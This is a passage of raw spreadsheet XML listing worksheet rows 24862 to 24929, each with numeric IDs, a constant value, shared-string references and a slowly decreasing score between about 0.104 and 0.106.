      </c>
      <c r="C24862" s="2" t="s">
        <v>23928</v>
      </c>
      <c r="D24862" s="2">
        <v>1.0</v>
      </c>
      <c r="E24862" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24862" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="24863" ht="15.75" customHeight="1">
      <c r="A24863" s="1">
        <v>16408.0</v>
      </c>
      <c r="B24863" s="2">
        <v>4.6294756E7</v>
      </c>
      <c r="C24863" s="2" t="s">
        <v>23929</v>
      </c>
      <c r="D24863" s="2">
        <v>1.0</v>
      </c>
      <c r="E24863" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24863" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="24864" ht="15.75" customHeight="1">
      <c r="A24864" s="1">
        <v>20060.0</v>
      </c>
      <c r="B24864" s="2">
        <v>8420356.0</v>
      </c>
      <c r="C24864" s="2" t="s">
        <v>23930</v>
      </c>
      <c r="D24864" s="2">
        <v>1.0</v>
      </c>
      <c r="E24864" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24864" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="24865" ht="15.75" customHeight="1">
      <c r="A24865" s="1">
        <v>22135.0</v>
      </c>
      <c r="B24865" s="2">
        <v>3.1098759E7</v>
      </c>
      <c r="C24865" s="2" t="s">
        <v>23931</v>
      </c>
      <c r="D24865" s="2">
        <v>1.0</v>
      </c>
      <c r="E24865" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24865" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="24866" ht="15.75" customHeight="1">
      <c r="A24866" s="1">
        <v>25811.0</v>
      </c>
      <c r="B24866" s="2">
        <v>1.4750188E7</v>
      </c>
      <c r="C24866" s="2" t="s">
        <v>23932</v>
      </c>
      <c r="D24866" s="2">
        <v>1.0</v>
      </c>
      <c r="E24866" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24866" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="24867" ht="15.75" customHeight="1">
      <c r="A24867" s="1">
        <v>27773.0</v>
      </c>
      <c r="B24867" s="2">
        <v>2.3113671E7</v>
      </c>
      <c r="C24867" s="2" t="s">
        <v>23933</v>
      </c>
      <c r="D24867" s="2">
        <v>1.0</v>
      </c>
      <c r="E24867" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24867" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="24868" ht="15.75" customHeight="1">
      <c r="A24868" s="1">
        <v>31459.0</v>
      </c>
      <c r="B24868" s="2">
        <v>5039368.0</v>
      </c>
      <c r="C24868" s="2" t="s">
        <v>23934</v>
      </c>
      <c r="D24868" s="2">
        <v>1.0</v>
      </c>
      <c r="E24868" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24868" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="24869" ht="15.75" customHeight="1">
      <c r="A24869" s="1">
        <v>32694.0</v>
      </c>
      <c r="B24869" s="2">
        <v>5953811.0</v>
      </c>
      <c r="C24869" s="2" t="s">
        <v>23935</v>
      </c>
      <c r="D24869" s="2">
        <v>1.0</v>
      </c>
      <c r="E24869" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24869" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="24870" ht="15.75" customHeight="1">
      <c r="A24870" s="1">
        <v>1944.0</v>
      </c>
      <c r="B24870" s="2">
        <v>3.0217567E7</v>
      </c>
      <c r="C24870" s="2" t="s">
        <v>23936</v>
      </c>
      <c r="D24870" s="2">
        <v>1.0</v>
      </c>
      <c r="E24870" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24870" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24871" ht="15.75" customHeight="1">
      <c r="A24871" s="1">
        <v>12696.0</v>
      </c>
      <c r="B24871" s="2">
        <v>3.0754618E7</v>
      </c>
      <c r="C24871" s="2" t="s">
        <v>23937</v>
      </c>
      <c r="D24871" s="2">
        <v>1.0</v>
      </c>
      <c r="E24871" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24871" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24872" ht="15.75" customHeight="1">
      <c r="A24872" s="1">
        <v>14238.0</v>
      </c>
      <c r="B24872" s="2">
        <v>3.830811E7</v>
      </c>
      <c r="C24872" s="2" t="s">
        <v>23938</v>
      </c>
      <c r="D24872" s="2">
        <v>1.0</v>
      </c>
      <c r="E24872" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24872" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24873" ht="15.75" customHeight="1">
      <c r="A24873" s="1">
        <v>15102.0</v>
      </c>
      <c r="B24873" s="2">
        <v>4.1809458E7</v>
      </c>
      <c r="C24873" s="2" t="s">
        <v>23939</v>
      </c>
      <c r="D24873" s="2">
        <v>1.0</v>
      </c>
      <c r="E24873" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24873" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24874" ht="15.75" customHeight="1">
      <c r="A24874" s="1">
        <v>22108.0</v>
      </c>
      <c r="B24874" s="2">
        <v>3.0907857E7</v>
      </c>
      <c r="C24874" s="2" t="s">
        <v>23940</v>
      </c>
      <c r="D24874" s="2">
        <v>1.0</v>
      </c>
      <c r="E24874" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24874" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24875" ht="15.75" customHeight="1">
      <c r="A24875" s="1">
        <v>22757.0</v>
      </c>
      <c r="B24875" s="2">
        <v>4.4633755E7</v>
      </c>
      <c r="C24875" s="2" t="s">
        <v>23941</v>
      </c>
      <c r="D24875" s="2">
        <v>1.0</v>
      </c>
      <c r="E24875" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24875" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24876" ht="15.75" customHeight="1">
      <c r="A24876" s="1">
        <v>23211.0</v>
      </c>
      <c r="B24876" s="2">
        <v>5270381.0</v>
      </c>
      <c r="C24876" s="2" t="s">
        <v>23942</v>
      </c>
      <c r="D24876" s="2">
        <v>1.0</v>
      </c>
      <c r="E24876" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24876" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24877" ht="15.75" customHeight="1">
      <c r="A24877" s="1">
        <v>23766.0</v>
      </c>
      <c r="B24877" s="2">
        <v>7537517.0</v>
      </c>
      <c r="C24877" s="2" t="s">
        <v>23943</v>
      </c>
      <c r="D24877" s="2">
        <v>1.0</v>
      </c>
      <c r="E24877" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24877" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24878" ht="15.75" customHeight="1">
      <c r="A24878" s="1">
        <v>24216.0</v>
      </c>
      <c r="B24878" s="2">
        <v>1.0415666E7</v>
      </c>
      <c r="C24878" s="2" t="s">
        <v>23944</v>
      </c>
      <c r="D24878" s="2">
        <v>1.0</v>
      </c>
      <c r="E24878" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24878" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24879" ht="15.75" customHeight="1">
      <c r="A24879" s="1">
        <v>33045.0</v>
      </c>
      <c r="B24879" s="2">
        <v>6750643.0</v>
      </c>
      <c r="C24879" s="2" t="s">
        <v>23945</v>
      </c>
      <c r="D24879" s="2">
        <v>1.0</v>
      </c>
      <c r="E24879" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24879" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="24880" ht="15.75" customHeight="1">
      <c r="A24880" s="1">
        <v>6768.0</v>
      </c>
      <c r="B24880" s="2">
        <v>4.9420176E7</v>
      </c>
      <c r="C24880" s="2" t="s">
        <v>23946</v>
      </c>
      <c r="D24880" s="2">
        <v>1.0</v>
      </c>
      <c r="E24880" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24880" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="24881" ht="15.75" customHeight="1">
      <c r="A24881" s="1">
        <v>17377.0</v>
      </c>
      <c r="B24881" s="2">
        <v>4.952809E7</v>
      </c>
      <c r="C24881" s="2" t="s">
        <v>23947</v>
      </c>
      <c r="D24881" s="2">
        <v>1.0</v>
      </c>
      <c r="E24881" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24881" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="24882" ht="15.75" customHeight="1">
      <c r="A24882" s="1">
        <v>19382.0</v>
      </c>
      <c r="B24882" s="2">
        <v>5.550493E7</v>
      </c>
      <c r="C24882" s="2" t="s">
        <v>23948</v>
      </c>
      <c r="D24882" s="2">
        <v>1.0</v>
      </c>
      <c r="E24882" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24882" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="24883" ht="15.75" customHeight="1">
      <c r="A24883" s="1">
        <v>19465.0</v>
      </c>
      <c r="B24883" s="2">
        <v>5.5777345E7</v>
      </c>
      <c r="C24883" s="2" t="s">
        <v>23949</v>
      </c>
      <c r="D24883" s="2">
        <v>1.0</v>
      </c>
      <c r="E24883" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24883" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="24884" ht="15.75" customHeight="1">
      <c r="A24884" s="1">
        <v>22008.0</v>
      </c>
      <c r="B24884" s="2">
        <v>2.9831594E7</v>
      </c>
      <c r="C24884" s="2" t="s">
        <v>23791</v>
      </c>
      <c r="D24884" s="2">
        <v>1.0</v>
      </c>
      <c r="E24884" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24884" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="24885" ht="15.75" customHeight="1">
      <c r="A24885" s="1">
        <v>24159.0</v>
      </c>
      <c r="B24885" s="2">
        <v>1.0133771E7</v>
      </c>
      <c r="C24885" s="2" t="s">
        <v>23950</v>
      </c>
      <c r="D24885" s="2">
        <v>1.0</v>
      </c>
      <c r="E24885" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24885" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="24886" ht="15.75" customHeight="1">
      <c r="A24886" s="1">
        <v>27257.0</v>
      </c>
      <c r="B24886" s="2">
        <v>2.1147209E7</v>
      </c>
      <c r="C24886" s="2" t="s">
        <v>23951</v>
      </c>
      <c r="D24886" s="2">
        <v>1.0</v>
      </c>
      <c r="E24886" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24886" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="24887" ht="15.75" customHeight="1">
      <c r="A24887" s="1">
        <v>27381.0</v>
      </c>
      <c r="B24887" s="2">
        <v>2.1749735E7</v>
      </c>
      <c r="C24887" s="2" t="s">
        <v>23952</v>
      </c>
      <c r="D24887" s="2">
        <v>1.0</v>
      </c>
      <c r="E24887" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24887" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="24888" ht="15.75" customHeight="1">
      <c r="A24888" s="1">
        <v>28516.0</v>
      </c>
      <c r="B24888" s="2">
        <v>2.6749857E7</v>
      </c>
      <c r="C24888" s="2" t="s">
        <v>23953</v>
      </c>
      <c r="D24888" s="2">
        <v>1.0</v>
      </c>
      <c r="E24888" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24888" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="24889" ht="15.75" customHeight="1">
      <c r="A24889" s="1">
        <v>20067.0</v>
      </c>
      <c r="B24889" s="2">
        <v>8737379.0</v>
      </c>
      <c r="C24889" s="2" t="s">
        <v>23954</v>
      </c>
      <c r="D24889" s="2">
        <v>1.0</v>
      </c>
      <c r="E24889" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24889" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="24890" ht="15.75" customHeight="1">
      <c r="A24890" s="1">
        <v>20414.0</v>
      </c>
      <c r="B24890" s="2">
        <v>1.222813E7</v>
      </c>
      <c r="C24890" s="2" t="s">
        <v>23955</v>
      </c>
      <c r="D24890" s="2">
        <v>1.0</v>
      </c>
      <c r="E24890" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24890" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="24891" ht="15.75" customHeight="1">
      <c r="A24891" s="1">
        <v>21340.0</v>
      </c>
      <c r="B24891" s="2">
        <v>2.112533E7</v>
      </c>
      <c r="C24891" s="2" t="s">
        <v>23956</v>
      </c>
      <c r="D24891" s="2">
        <v>1.0</v>
      </c>
      <c r="E24891" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24891" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="24892" ht="15.75" customHeight="1">
      <c r="A24892" s="1">
        <v>22503.0</v>
      </c>
      <c r="B24892" s="2">
        <v>3.7314191E7</v>
      </c>
      <c r="C24892" s="2" t="s">
        <v>23957</v>
      </c>
      <c r="D24892" s="2">
        <v>1.0</v>
      </c>
      <c r="E24892" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24892" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="24893" ht="15.75" customHeight="1">
      <c r="A24893" s="1">
        <v>24513.0</v>
      </c>
      <c r="B24893" s="2">
        <v>1.1146114E7</v>
      </c>
      <c r="C24893" s="2" t="s">
        <v>23958</v>
      </c>
      <c r="D24893" s="2">
        <v>1.0</v>
      </c>
      <c r="E24893" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24893" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="24894" ht="15.75" customHeight="1">
      <c r="A24894" s="1">
        <v>16636.0</v>
      </c>
      <c r="B24894" s="2">
        <v>4.711156E7</v>
      </c>
      <c r="C24894" s="2" t="s">
        <v>23959</v>
      </c>
      <c r="D24894" s="2">
        <v>1.0</v>
      </c>
      <c r="E24894" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24894" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="24895" ht="15.75" customHeight="1">
      <c r="A24895" s="1">
        <v>32665.0</v>
      </c>
      <c r="B24895" s="2">
        <v>5923521.0</v>
      </c>
      <c r="C24895" s="2" t="s">
        <v>23960</v>
      </c>
      <c r="D24895" s="2">
        <v>1.0</v>
      </c>
      <c r="E24895" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24895" s="2">
        <v>0.1053921568627451</v>
      </c>
    </row>
    <row r="24896" ht="15.75" customHeight="1">
      <c r="A24896" s="1">
        <v>34232.0</v>
      </c>
      <c r="B24896" s="2">
        <v>4729762.0</v>
      </c>
      <c r="C24896" s="2" t="s">
        <v>23961</v>
      </c>
      <c r="D24896" s="2">
        <v>1.0</v>
      </c>
      <c r="E24896" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24896" s="2">
        <v>0.1052188552188552</v>
      </c>
    </row>
    <row r="24897" ht="15.75" customHeight="1">
      <c r="A24897" s="1">
        <v>13517.0</v>
      </c>
      <c r="B24897" s="2">
        <v>3.5483859E7</v>
      </c>
      <c r="C24897" s="2" t="s">
        <v>23962</v>
      </c>
      <c r="D24897" s="2">
        <v>1.0</v>
      </c>
      <c r="E24897" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24897" s="2">
        <v>0.1051282051282051</v>
      </c>
    </row>
    <row r="24898" ht="15.75" customHeight="1">
      <c r="A24898" s="1">
        <v>6424.0</v>
      </c>
      <c r="B24898" s="2">
        <v>4.8557666E7</v>
      </c>
      <c r="C24898" s="2" t="s">
        <v>23963</v>
      </c>
      <c r="D24898" s="2">
        <v>1.0</v>
      </c>
      <c r="E24898" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24898" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="24899" ht="15.75" customHeight="1">
      <c r="A24899" s="1">
        <v>20143.0</v>
      </c>
      <c r="B24899" s="2">
        <v>1.0157633E7</v>
      </c>
      <c r="C24899" s="2" t="s">
        <v>23964</v>
      </c>
      <c r="D24899" s="2">
        <v>1.0</v>
      </c>
      <c r="E24899" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24899" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="24900" ht="15.75" customHeight="1">
      <c r="A24900" s="1">
        <v>25078.0</v>
      </c>
      <c r="B24900" s="2">
        <v>1.28818E7</v>
      </c>
      <c r="C24900" s="2" t="s">
        <v>23965</v>
      </c>
      <c r="D24900" s="2">
        <v>1.0</v>
      </c>
      <c r="E24900" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24900" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="24901" ht="15.75" customHeight="1">
      <c r="A24901" s="1">
        <v>4524.0</v>
      </c>
      <c r="B24901" s="2">
        <v>4.2616392E7</v>
      </c>
      <c r="C24901" s="2" t="s">
        <v>23966</v>
      </c>
      <c r="D24901" s="2">
        <v>1.0</v>
      </c>
      <c r="E24901" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24901" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24902" ht="15.75" customHeight="1">
      <c r="A24902" s="1">
        <v>13236.0</v>
      </c>
      <c r="B24902" s="2">
        <v>3.4253919E7</v>
      </c>
      <c r="C24902" s="2" t="s">
        <v>23967</v>
      </c>
      <c r="D24902" s="2">
        <v>1.0</v>
      </c>
      <c r="E24902" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24902" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24903" ht="15.75" customHeight="1">
      <c r="A24903" s="1">
        <v>19049.0</v>
      </c>
      <c r="B24903" s="2">
        <v>5.4578302E7</v>
      </c>
      <c r="C24903" s="2" t="s">
        <v>23968</v>
      </c>
      <c r="D24903" s="2">
        <v>1.0</v>
      </c>
      <c r="E24903" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24903" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24904" ht="15.75" customHeight="1">
      <c r="A24904" s="1">
        <v>21290.0</v>
      </c>
      <c r="B24904" s="2">
        <v>2.0492977E7</v>
      </c>
      <c r="C24904" s="2" t="s">
        <v>23969</v>
      </c>
      <c r="D24904" s="2">
        <v>1.0</v>
      </c>
      <c r="E24904" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24904" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24905" ht="15.75" customHeight="1">
      <c r="A24905" s="1">
        <v>25291.0</v>
      </c>
      <c r="B24905" s="2">
        <v>1.3405258E7</v>
      </c>
      <c r="C24905" s="2" t="s">
        <v>23970</v>
      </c>
      <c r="D24905" s="2">
        <v>1.0</v>
      </c>
      <c r="E24905" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24905" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24906" ht="15.75" customHeight="1">
      <c r="A24906" s="1">
        <v>26580.0</v>
      </c>
      <c r="B24906" s="2">
        <v>1.7918981E7</v>
      </c>
      <c r="C24906" s="2" t="s">
        <v>23971</v>
      </c>
      <c r="D24906" s="2">
        <v>1.0</v>
      </c>
      <c r="E24906" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24906" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24907" ht="15.75" customHeight="1">
      <c r="A24907" s="1">
        <v>27466.0</v>
      </c>
      <c r="B24907" s="2">
        <v>2.1987458E7</v>
      </c>
      <c r="C24907" s="2" t="s">
        <v>23972</v>
      </c>
      <c r="D24907" s="2">
        <v>1.0</v>
      </c>
      <c r="E24907" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24907" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24908" ht="15.75" customHeight="1">
      <c r="A24908" s="1">
        <v>28449.0</v>
      </c>
      <c r="B24908" s="2">
        <v>2.6574619E7</v>
      </c>
      <c r="C24908" s="2" t="s">
        <v>23973</v>
      </c>
      <c r="D24908" s="2">
        <v>1.0</v>
      </c>
      <c r="E24908" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24908" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24909" ht="15.75" customHeight="1">
      <c r="A24909" s="1">
        <v>31362.0</v>
      </c>
      <c r="B24909" s="2">
        <v>4987625.0</v>
      </c>
      <c r="C24909" s="2" t="s">
        <v>23974</v>
      </c>
      <c r="D24909" s="2">
        <v>1.0</v>
      </c>
      <c r="E24909" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24909" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24910" ht="15.75" customHeight="1">
      <c r="A24910" s="1">
        <v>34099.0</v>
      </c>
      <c r="B24910" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C24910" s="2" t="s">
        <v>23975</v>
      </c>
      <c r="D24910" s="2">
        <v>1.0</v>
      </c>
      <c r="E24910" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24910" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="24911" ht="15.75" customHeight="1">
      <c r="A24911" s="1">
        <v>740.0</v>
      </c>
      <c r="B24911" s="2">
        <v>2.0839973E7</v>
      </c>
      <c r="C24911" s="2" t="s">
        <v>23976</v>
      </c>
      <c r="D24911" s="2">
        <v>1.0</v>
      </c>
      <c r="E24911" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24911" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="24912" ht="15.75" customHeight="1">
      <c r="A24912" s="1">
        <v>23300.0</v>
      </c>
      <c r="B24912" s="2">
        <v>5.4028951E7</v>
      </c>
      <c r="C24912" s="2" t="s">
        <v>23977</v>
      </c>
      <c r="D24912" s="2">
        <v>1.0</v>
      </c>
      <c r="E24912" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24912" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="24913" ht="15.75" customHeight="1">
      <c r="A24913" s="1">
        <v>32923.0</v>
      </c>
      <c r="B24913" s="2">
        <v>6423393.0</v>
      </c>
      <c r="C24913" s="2" t="s">
        <v>23978</v>
      </c>
      <c r="D24913" s="2">
        <v>1.0</v>
      </c>
      <c r="E24913" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24913" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="24914" ht="15.75" customHeight="1">
      <c r="A24914" s="1">
        <v>13843.0</v>
      </c>
      <c r="B24914" s="2">
        <v>3.6832256E7</v>
      </c>
      <c r="C24914" s="2" t="s">
        <v>23979</v>
      </c>
      <c r="D24914" s="2">
        <v>1.0</v>
      </c>
      <c r="E24914" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24914" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24915" ht="15.75" customHeight="1">
      <c r="A24915" s="1">
        <v>15841.0</v>
      </c>
      <c r="B24915" s="2">
        <v>4.4397692E7</v>
      </c>
      <c r="C24915" s="2" t="s">
        <v>23980</v>
      </c>
      <c r="D24915" s="2">
        <v>1.0</v>
      </c>
      <c r="E24915" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24915" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24916" ht="15.75" customHeight="1">
      <c r="A24916" s="1">
        <v>17264.0</v>
      </c>
      <c r="B24916" s="2">
        <v>4.9153073E7</v>
      </c>
      <c r="C24916" s="2" t="s">
        <v>23981</v>
      </c>
      <c r="D24916" s="2">
        <v>1.0</v>
      </c>
      <c r="E24916" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24916" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24917" ht="15.75" customHeight="1">
      <c r="A24917" s="1">
        <v>17379.0</v>
      </c>
      <c r="B24917" s="2">
        <v>4.952809E7</v>
      </c>
      <c r="C24917" s="2" t="s">
        <v>23982</v>
      </c>
      <c r="D24917" s="2">
        <v>1.0</v>
      </c>
      <c r="E24917" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24917" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24918" ht="15.75" customHeight="1">
      <c r="A24918" s="1">
        <v>20076.0</v>
      </c>
      <c r="B24918" s="2">
        <v>9025401.0</v>
      </c>
      <c r="C24918" s="2" t="s">
        <v>23983</v>
      </c>
      <c r="D24918" s="2">
        <v>1.0</v>
      </c>
      <c r="E24918" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24918" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24919" ht="15.75" customHeight="1">
      <c r="A24919" s="1">
        <v>20388.0</v>
      </c>
      <c r="B24919" s="2">
        <v>1.2030553E7</v>
      </c>
      <c r="C24919" s="2" t="s">
        <v>23984</v>
      </c>
      <c r="D24919" s="2">
        <v>1.0</v>
      </c>
      <c r="E24919" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24919" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24920" ht="15.75" customHeight="1">
      <c r="A24920" s="1">
        <v>24235.0</v>
      </c>
      <c r="B24920" s="2">
        <v>1.046213E7</v>
      </c>
      <c r="C24920" s="2" t="s">
        <v>23985</v>
      </c>
      <c r="D24920" s="2">
        <v>1.0</v>
      </c>
      <c r="E24920" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24920" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24921" ht="15.75" customHeight="1">
      <c r="A24921" s="1">
        <v>24753.0</v>
      </c>
      <c r="B24921" s="2">
        <v>1.1815341E7</v>
      </c>
      <c r="C24921" s="2" t="s">
        <v>23986</v>
      </c>
      <c r="D24921" s="2">
        <v>1.0</v>
      </c>
      <c r="E24921" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24921" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24922" ht="15.75" customHeight="1">
      <c r="A24922" s="1">
        <v>28199.0</v>
      </c>
      <c r="B24922" s="2">
        <v>2.5016994E7</v>
      </c>
      <c r="C24922" s="2" t="s">
        <v>23987</v>
      </c>
      <c r="D24922" s="2">
        <v>1.0</v>
      </c>
      <c r="E24922" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24922" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24923" ht="15.75" customHeight="1">
      <c r="A24923" s="1">
        <v>30350.0</v>
      </c>
      <c r="B24923" s="2">
        <v>3.8243058E7</v>
      </c>
      <c r="C24923" s="2" t="s">
        <v>23988</v>
      </c>
      <c r="D24923" s="2">
        <v>1.0</v>
      </c>
      <c r="E24923" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24923" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24924" ht="15.75" customHeight="1">
      <c r="A24924" s="1">
        <v>31340.0</v>
      </c>
      <c r="B24924" s="2">
        <v>4.9807413E7</v>
      </c>
      <c r="C24924" s="2" t="s">
        <v>23989</v>
      </c>
      <c r="D24924" s="2">
        <v>1.0</v>
      </c>
      <c r="E24924" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24924" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="24925" ht="15.75" customHeight="1">
      <c r="A24925" s="1">
        <v>2595.0</v>
      </c>
      <c r="B24925" s="2">
        <v>3.4363577E7</v>
      </c>
      <c r="C24925" s="2" t="s">
        <v>23990</v>
      </c>
      <c r="D24925" s="2">
        <v>1.0</v>
      </c>
      <c r="E24925" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24925" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="24926" ht="15.75" customHeight="1">
      <c r="A24926" s="1">
        <v>20737.0</v>
      </c>
      <c r="B24926" s="2">
        <v>1.4750189E7</v>
      </c>
      <c r="C24926" s="2" t="s">
        <v>23991</v>
      </c>
      <c r="D24926" s="2">
        <v>1.0</v>
      </c>
      <c r="E24926" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24926" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="24927" ht="15.75" customHeight="1">
      <c r="A24927" s="1">
        <v>22471.0</v>
      </c>
      <c r="B24927" s="2">
        <v>3.6789934E7</v>
      </c>
      <c r="C24927" s="2" t="s">
        <v>23992</v>
      </c>
      <c r="D24927" s="2">
        <v>1.0</v>
      </c>
      <c r="E24927" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24927" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="24928" ht="15.75" customHeight="1">
      <c r="A24928" s="1">
        <v>25932.0</v>
      </c>
      <c r="B24928" s="2">
        <v>1.5191443E7</v>
      </c>
      <c r="C24928" s="2" t="s">
        <v>23993</v>
      </c>
      <c r="D24928" s="2">
        <v>1.0</v>
      </c>
      <c r="E24928" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24928" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="24929" ht="15.75" customHeight="1">
      <c r="A24929" s="1">
        <v>27572.0</v>
      </c>
      <c r="B24929" s="2">
        <v>2.2434626E7</v>
      </c>
      <c r="C24929" s="2" t="s">
        <v>23994</v>
      </c>
